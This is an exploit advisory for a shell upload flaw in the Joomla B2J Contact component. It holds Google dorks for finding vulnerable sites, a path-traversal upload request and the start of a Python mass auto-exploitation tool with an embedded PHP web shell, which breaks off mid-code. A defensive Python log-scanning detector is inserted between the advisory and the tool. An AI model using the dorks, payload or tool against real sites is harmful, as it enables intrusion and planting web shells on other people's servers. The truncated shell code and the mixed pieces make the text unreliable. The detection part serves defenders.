#################################################################################################
# Exploit Title : Joomla Codextrous Com_B2jcontact Components 2.1.17 Shell Upload
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/01/2019
# Vendor Homepage : codextrous.com/joomla-components/b2j-contact.html
+ extensions.joomla.org/extension/b2j-contact/
# Software Download Link : codextrous.com/joomla-components/b2j-contact.html?utm_source=jed&utm_medium=download&utm_campaign=b2jcontact
# Software Price : 29$
# Version Information : 2.1.17
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-264 [ Permissions, Privileges, and Access Controls ]
+ CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
# CVE-Details => CVE-2017-9030 - CVE-2017-5215 - CVE-2017-5214
# Cyberizm Exploit Reference Link : cyberizm.org/cyberizm-joomla-codextrous-com-b2jcontact-shell-upload-exploit.html
# Exploit4Arab Reference Link : exploit4arab.org/exploits/2098
#################################################################################################
# Description : B2J Contact is one of the most popular extensions from Codextrous and is used to create contact forms.
This revolutionary, multi-functional Joomla! contact form component is super easy to install
and brings you the ultimate in user experience with its clean design and user-friendly backend.
You can create as many contact forms as you want.
To display a contact form, you also create a menu item for it.
B2J Contact also comes with a module, with which you can display a contact form wherever you want.
B2J Contact has the following main options that users may customize:
Basic Option - Default Fields - Dynamic Fields - Events - Security
Each section opens up further custom options/fields for you to play with
to get your contact form up and running smoothly. Despite its enormous functionality,
the B2J Contact component is extremely lightweight, with an amazing design.
Whether you are making an online survey or simply creating another contact form,
the B2J Contact component is there to help you!
B2J Contact comes with all the key features mentioned below and more:
Joomla! 3.0 Support - In-built Form Builder -
Access to extension support system - All features shown on the Demo
#################################################################################################
# Google Dorks :
inurl:''/index.php?option=com_b2jcontact''
inurl:''/components/com_b2jcontact/''
intext:''Another Great Website by One Spot Media.''
intext:''Bootstrap is a front-end framework of Twitter, Inc. Code licensed
under MIT License.
Font Awesome font licensed under SIL OFL 1.1.''
intext:''POWERED BY VISUALPROJECT WEB''
intext:''A(c) 2013-2014 Opentec SRL, tutti i diritti riservati.''
intext:''honlap: rosko.hu''
+There are more dorks. Use your brain to find more.
# Exploit :
/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah
# Error displayed on the page [ the error language changes according to the country ] :
{"error":"File is empty."}
{"error":"No files were uploaded."}
{"error":"null."}
{"error":"Keine Dateien hochgeladen."}
# Uploaded File Path : /components/com_b2jcontact/.....
# Allowed File Extensions : .php .php5 .html .txt .jpg .jpeg .gif .png .xml .pdf and other extensions.
# Use Auto Exploiter Tool for this Vulnerability.
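For defenders, requests to the uploader endpoint described above can be found in web server access logs. The following is an added detection example, not part of the original advisory or its tool; it assumes common/combined log format, and the sample log lines, IP addresses and file names are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Extensions from the advisory's accepted list that a web server may interpret.
RISKY_EXT = (".php", ".php5", ".html")
COMPONENT_DIR = "/components/com_b2jcontact/"
# Common/combined access log prefix: client ip, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')

def classify(target):
    """Return the reasons a request target matches the advisory's upload pattern."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    # parse_qs percent-decodes values; keep the last value of repeated keys.
    q = {k.lower(): v[-1] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    reasons = []
    if (q.get("option", "").lower() == "com_b2jcontact"
            and q.get("view", "").lower() == "loader"
            and q.get("type", "").lower() == "uploader"):
        reasons.append("uploader endpoint")
        name = q.get("qqfile", "").lower()
        if ".." in name or "/" in name or "\\" in name:
            reasons.append("path characters in qqfile")
        if name.rstrip(". ").endswith(RISKY_EXT):
            reasons.append("interpretable extension in qqfile")
    # Assumption: Joomla serves components through index.php, so a direct request
    # for a script below the component directory is unusual and worth review.
    if COMPONENT_DIR in path and path.endswith((".php", ".php5")):
        reasons.append("direct script request under component directory")
    return reasons

def scan(lines):
    """Yield (client_ip, status, reasons) for every log line that matches."""
    for line in lines:
        m = LOG_RE.match(line)
        if m and (reasons := classify(m.group(2))):
            yield m.group(1), int(m.group(3)), reasons

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '192.0.2.10 - - [04/Jan/2019:10:00:01 +0000] "GET /index.php?option=com_b2jcontact&view=b2jcontact&Itemid=138 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [04/Jan/2019:10:02:13 +0000] "POST /index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=%2F..%2F..%2Fsample.php HTTP/1.1" 200 18',
    '198.51.100.7 - - [04/Jan/2019:10:02:20 +0000] "GET /components/com_b2jcontact/sample.php HTTP/1.1" 200 77',
    '192.0.2.33 - - [04/Jan/2019:10:05:00 +0000] "POST /index.php?option=com_b2jcontact&view=loader&type=uploader&qqfile=photo.jpg HTTP/1.1" 200 16',
]

if __name__ == "__main__":
    for ip, status, reasons in scan(SAMPLE):
        print(ip, status, "; ".join(reasons))
```

A hit on "uploader endpoint" alone can be a legitimate form attachment; the path-character and extension reasons, or a later direct script request from the same client, are the ones to triage first.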
#################################################################################################
# Auto Exploitation Tool Python =>
import requests as r
import argparse as arg
import os, sys
import urllib2,urllib,re
from multiprocessing import Pool
from multiprocessing.dummy import Pool as ThreadPool
from urlparse import urlparse
import random, string
#Coded By KingSkrupellos
#Cyberizm Digital Security Team
def wibu(length):
    letters = string.ascii_lowercase
    return ''.join(random.choice(letters) for i in range(length))
shell = """
$value){
$_POST[$key] = stripslashes($value);
}
}
echo '